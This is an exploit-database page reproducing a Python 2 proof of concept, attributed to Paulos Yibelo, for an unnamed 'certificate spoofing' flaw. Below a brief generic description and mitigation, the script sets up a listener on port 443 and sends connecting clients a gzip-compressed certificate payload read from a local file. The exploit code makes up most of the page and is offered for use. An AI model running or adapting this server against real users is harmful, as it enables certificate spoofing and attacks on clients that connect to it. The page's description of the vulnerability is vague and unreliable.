header-logo
Suggest Exploit
vendor:
N/A
by:
Paulos Yibelo
8.8
CVSS
HIGH
Certificate Spoofing
295
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2020

Certificate Spoofing Vulnerability

This exploit is a proof-of-concept code for a certificate spoofing vulnerability. It listens for incoming connections on port 443 and sends a malicious certificate to the client. The malicious certificate is stored in a file called 'compressed'. This vulnerability can be used to spoof a legitimate certificate and gain access to sensitive information.

Mitigation:

To mitigate this vulnerability, the server should be configured to only accept certificates from trusted sources. Additionally, the server should be configured to reject any certificate that does not match the expected certificate.
Source

Exploit-DB raw data:

#!/usr/bin/python2

import socket
import sys
import time

kHost = '127.0.0.1'
kPort = 443

def bind_listen():
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
  s.bind((kHost, kPort))
  s.listen(1)
  return s

def send_certificate(c, r):
  print '[*] sending certificate'
  payload = ''
  with open('compressed', 'rb') as tmp:
    payload = tmp.read()
  c.send('HTTP/1.1 200 OK\r\n')
  c.send('Content-Type: application/x-x509-user-cert\r\n')
  c.send('Content-Encoding: gzip\r\n')
  c.send('Content-Length: {}\r\n'.format(len(payload)))
  c.send('\r\n')
  c.send(payload)

def main():
  print '[*] listening for connection on port {}:{}'.format(kHost, kPort)
  s = bind_listen()
  while True:
    c, (host, port) = s.accept()
    print '[*] connection from {}:{}'.format(host, port)
    while True:
      r = c.recv(1024)
      if 'favicon' in r:
        c.send('HTTP/1.1 404 Not Found\r\n\r\n')
      else:
        send_certificate(c, r)
        time.sleep(20)
        sys.exit(0)

if __name__ == '__main__':
  main()

Thanks,
Paulos Yibelo

Navigation

Suggest Exploit

Services By CQR